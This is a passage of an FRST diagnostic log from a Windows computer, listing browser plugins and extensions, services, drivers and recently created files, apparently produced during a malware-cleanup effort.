CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => No File
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol400.dll (Catalina Marketing Corporation)
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol500.dll (Catalina Marketing Corporation)
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npCouponPrinter.dll => No File
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npMozCouponPrinter.dll => No File
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll => No File
CHR Plugin: (DivX Web Player) - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll => No File
CHR Plugin: (Foxit Reader Plugin for Mozilla) - C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll => No File
CHR Plugin: (Java Platform SE 7 U7) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (McAfee Security Scanner +) - C:\Program Files (x86)\McAfee Security Scan\3.0.318\npMcAfeeMss.dll => No File
CHR Plugin: (My Web Search Plugin Stub) - C:\Program Files (x86)\MyWebSearch\bar\1.bin\NPMyWebS.dll => No File
CHR Plugin: (Windows Live® Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Shockwave Flash) - C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_6_602_180.dll => No File
CHR Plugin: (Java Deployment Toolkit 7.0.70.11) - C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
CHR Profile: C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (The Best Price (extension)) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\gehjddhojclknjlgakpfmhlhkbpeakjf [2013-07-04]
CHR Extension: (Any.do Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2016-03-08]
CHR Extension: (Evernote Web) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbfehkoinhhcknnbdgnnmjhiladcgbol [2014-03-18]
CHR Extension: (Google Maps) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2015-09-28]
CHR Extension: (Springpad Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\njhgeimnepehieioinbhmfpphfoocmng [2013-07-04]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-01]
CHR Extension: (My Chrome Theme) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\oehpjpccmlcalbenfhnacjeocbjdonic [2015-08-27]
CHR Extension: (Evernote Web Clipper) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2016-03-08]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ADVService; C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe [25704 2011-11-24] (Amazon.com) [File not signed]
R2 LeapFrog Connect Device Service; C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe [7241728 2014-07-11] (LeapFrog Enterprises, Inc.) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe [126392 2009-08-24] (Symantec Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [315648 2015-09-28] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-06-12] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys [43664 2015-01-28] ()
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-09] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-12] (Synaptics Incorporated)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2012-07-05] (Duplex Secure Ltd.)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45728 2015-08-27] (Toshiba Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 14:42 - 2016-03-09 14:42 - 00016148 _____ C:\WINDOWS\system32\DURABLE_Lexi_HistoryPrediction.bin
2016-03-09 10:30 - 2016-03-09 14:43 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-09 10:30 - 2016-03-09 10:30 - 00001186 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-09 10:30 - 2016-03-09 10:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-09 10:29 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-09 10:29 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-09 10:29 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-09 10:23 - 2016-03-09 10:24 - 22908888 _____ (Malwarebytes ) C:\Users\Lexi\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-09 10:01 - 2016-03-09 10:12 - 00043720 _____ C:\Users\Lexi\Downloads\Fixlog.txt
2016-03-08 22:47 - 2016-03-08 22:48 - 02374144 _____ (Farbar) C:\Users\Lexi\Downloads\FRST64.exe
2016-03-08 21:23 - 2016-02-23 07:16 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-08 21:23 - 2016-02-23 06:55 - 24592896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-08 21:23 - 2016-02-23 06:45 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-08 21:23 - 2016-02-23 05:55 - 19326464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-08 21:23 - 2016-02-23 05:48 - 21859840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-08 21:23 - 2016-02-23 05:38 - 07524864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-03-08 21:23 - 2016-02-23 05:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-08 21:23 - 2016-02-23 05:00 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-03-08 21:23 - 2016-02-23 04:58 - 18800640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-08 21:22 - 2016-02-23 09:53 - 01314496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-03-08 21:22 - 2016-02-23 09:52 - 00858408 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-08 21:22 - 2016-02-23 09:51 - 00633184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-03-08 21:22 - 2016-02-23 09:51 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-08 21:22 - 2016-02-23 09:50 - 00630160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-08 21:22 - 2016-02-23 09:48 - 08022368 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-08 21:22 - 2016-02-23 09:48 - 01294352 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-08 21:22 - 2016-02-23 09:48 - 01123952 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-08 21:22 - 2016-02-23 09:41 - 01150816 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-08 21:22 - 2016-02-23 09:41 - 00299600 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL
2016-03-08 21:22 - 2016-02-23 09:41 - 00078040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkscli.dll
2016-03-08 21:22 - 2016-02-23 09:40 - 00110584 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvcli.dll
2016-03-08 21:22 - 2016-02-23 09:38 - 00272752 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-08 21:22 - 2016-02-23 09:36 - 00080128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netapi32.dll
2016-03-08 21:22 - 2016-02-23 09:11 - 00781984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-03-08 21:22 - 2016-02-23 09:11 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-08 21:22 - 2016-02-23 09:11 - 00103776 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-03-08 21:22 - 2016-02-23 09:08 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-08 21:22 - 2016-02-23 09:07 - 22322624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-08 21:22 - 2016-02-23 08:39 - 00607416 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-03-08 21:22 - 2016-02-23 08:30 - 01643872 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-08 21:22 - 2016-02-23 08:25 - 01085632 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-03-08 21:22 - 2016-02-23 08:23 - 00952968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-03-08 21:22 - 2016-02-23 08:21 - 00529456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-08 21:22 - 2016-02-23 08:21 - 00141152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-08 21:22 - 2016-02-23 08:11 - 00249976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL
2016-03-08 21:22 - 2016-02-23 08:11 - 00073360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srvcli.dll
2016-03-08 21:22 - 2016-02-23 08:11 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wkscli.dll
2016-03-08 21:22 - 2016-02-23 08:09 - 00229352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-08 21:22 - 2016-02-23 08:06 - 00069232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netapi32.dll
2016-03-08 21:22 - 2016-02-23 07:58 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-03-08 21:22 - 2016-02-23 07:50 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-08 21:22 - 2016-02-23 07:50 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-03-08 21:22 - 2016-02-23 07:42 - 00658536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-03-08 21:22 - 2016-02-23 07:42 - 00467296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-08 21:22 - 2016-02-23 07:42 - 00078176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-03-08 21:22 - 2016-02-23 07:39 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-08 21:22 - 2016-02-23 07:38 - 20858360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-08 21:22 - 2016-02-23 07:35 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-03-08 21:22 - 2016-02-23 07:20 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-03-08 21:22 - 2016-02-23 07:17 - 00333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-03-08 21:22 - 2016-02-23 07:15 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-03-08 21:22 - 2016-02-23 07:15 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-03-08 21:22 - 2016-02-23 06:59 - 00319488 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll
2016-03-08 21:22 - 2016-02-23 06:59 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-08 21:22 - 2016-02-23 06:57 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-08 21:22 - 2016-02-23 06:45 - 06788608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-03-08 21:22 - 2016-02-23 06:42 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-03-08 21:22 - 2016-02-23 06:42 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-03-08 21:22 - 2016-02-23 06:38 - 02663424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-08 21:22 - 2016-02-23 06:37 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetCfgNotifyObjectHost.exe
2016-03-08 21:22 - 2016-02-23 06:36 - 00281600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-08 21:22 - 2016-02-23 06:25 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-03-08 21:22 - 2016-02-23 06:18 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-03-08 21:22 - 2016-02-23 06:17 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser.dll
2016-03-08 21:22 - 2016-02-23 06:17 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\browcli.dll
2016-03-08 21:22 - 2016-02-23 06:14 - 00841728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-03-08 21:22 - 2016-02-23 06:08 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-03-08 21:22 - 2016-02-23 06:04 - 00225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-08 21:22 - 2016-02-23 06:03 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-08 21:22 - 2016-02-23 06:03 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-03-08 21:22 - 2016-02-23 06:02 - 03587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-08 21:22 - 2016-02-23 05:55 - 14241792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-08 21:22 - 2016-02-23 05:51 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-08 21:22 - 2016-02-23 05:51 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-08 21:22 - 2016-02-23 05:48 - 05157376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-03-08 21:22 - 2016-02-23 05:46 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-08 21:22 - 2016-02-23 05:45 - 01844736 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-08 21:22 - 2016-02-23 05:45 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-03-08 21:22 - 2016-02-23 05:45 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-03-08 21:22 - 2016-02-23 05:45 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-03-08 21:22 - 2016-02-23 05:44 - 01821696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-08 21:22 - 2016-02-23 05:29 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\browcli.dll
2016-03-08 21:22 - 2016-02-23 05:17 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-08 21:22 - 2016-02-23 05:17 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-03-08 21:22 - 2016-02-23 05:11 - 12589056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-08 21:22 - 2016-02-23 05:03 - 01495040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-03-08 12:39 - 2016-03-08 12:39 - 00058675 _____ C:\Users\Lexi\Desktop\FRST.txt
2016-03-08 12:39 - 2016-03-08 12:39 - 00050962 _____ C:\Users\Lexi\Desktop\Addition.txt
2016-03-08 12:25 - 2016-03-08 23:00 - 00058257 _____ C:\Users\Lexi\Downloads\Addition.txt
2016-03-08 12:22 - 2016-03-09 14:51 - 00031582 _____ C:\Users\Lexi\Downloads\FRST.txt
2016-03-08 12:22 - 2016-03-09 14:51 - 00000000 ____D C:\FRST
2016-03-08 09:47 - 2016-03-08 22:03 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-08 09:28 - 2016-03-08 09:28 - 00001049 _____ C:\Users\Lexi\Documents\malwaresecondtime.txt
2016-03-08 09:27 - 2016-03-08 09:27 - 00081882 _____ C:\Users\Lexi\Documents\malwarfirsttime.txt
2016-03-07 23:01 - 2016-03-08 09:36 - 00000000 ____D C:\Users\Lexi\AppData\Local\Deployment
2016-03-06 21:09 - 2016-03-06 21:09 - 00058906 _____ C:\Users\Lexi\Desktop\sfcdetails.txt
2016-03-04 09:58 - 2016-03-09 10:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-04 09:58 - 2016-03-04 09:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-03 23:59 - 2016-03-07 13:16 - 00000000 ____D C:\AdwCleaner
2016-03-02 17:45 - 2016-03-02 17:45 - 00002675 _____ C:\Users\Lexi\Downloads\Your Great Value Vacations The notice on that all  documents are ready 20160003149979 _.html
2016-03-01 19:50 - 2016-03-01 19:50 - 00024404 _____ C:\Users\Lexi\Downloads\Aerobic Cellular Respiration Summary Table.pdf
2016-03-01 19:31 - 2016-03-01 19:31 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide (1).pdf
2016-03-01 19:30 - 2016-03-01 19:30 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide.pdf
2016-02-29 16:32 - 2016-02-29 16:32 - 00346580 _____ C:\Users\Lexi\Downloads\securedoc_20160219T091446.html
2016-02-29 16:10 - 2016-02-29 16:10 - 00137376 _____ C:\Users\Lexi\Downloads\March homework 2016.pdf
2016-02-25 20:18 - 2016-02-25 20:18 - 00537031 _____ C:\Users\Lexi\Downloads\msert.exe
2016-02-25 13:02 - 2016-02-25 21:16 - 08583186 _____ C:\Users\Lexi\Documents\AVG BIO101 template6.pptx
2016-02-24 23:06 - 2016-02-24 23:06 - 01112064 _____ C:\Users\Lexi\Downloads\05_Clicker_Questions.ppt
2016-02-24 23:05 - 2016-02-24 23:06 - 00773109 _____ C:\Users\Lexi\Downloads\06_Animations.zip
2016-02-24 23:05 - 2016-02-24 23:06 - 00747369 _____ C:\Users\Lexi\Downloads\06_Videos.zip
2016-02-24 23:05 - 2016-02-24 23:05 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions (1).ppt
2016-02-24 23:04 - 2016-02-24 23:04 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions.ppt
2016-02-24 18:01 - 2016-02-24 18:01 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-02-21 17:28 - 2016-02-21 17:29 - 41085818 _____ C:\Users\Lexi\Downloads\05_Videos.zip
2016-02-21 17:28 - 2016-02-21 17:29 - 127679537 _____ C:\Users\Lexi\Downloads\05_BioFlix_Animations.zip
2016-02-21 17:28 - 2016-02-21 17:28 - 02486374 _____ C:\Users\Lexi\Downloads\05_Animations.zip
2016-02-20 19:59 - 2016-02-20 19:59 - 00262144 _____ C:\WINDOWS\Minidump\022016-45890-01.dmp
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report.csv
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report (1).csv
2016-02-17 18:02 - 2016-03-08 22:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Evernote
2016-02-17 18:02 - 2016-02-17 18:02 - 00002523 _____ C:\Users\Public\Desktop\Evernote.lnk
2016-02-11 22:52 - 2016-02-11 22:52 - 00028661 _____ C:\Users\Lexi\Downloads\A Tour of the Cell Study Guide (1).pdf
2016-02-10 12:09 - 2016-02-10 12:09 - 08817344 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2016-02-10 09:09 - 2016-01-31 01:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-02-10 09:09 - 2016-01-31 00:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-10 09:09 - 2016-01-31 00:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 09:09 - 2016-01-31 00:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-02-10 09:09 - 2016-01-31 00:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 09:09 - 2016-01-31 00:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-02-10 09:09 - 2016-01-31 00:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
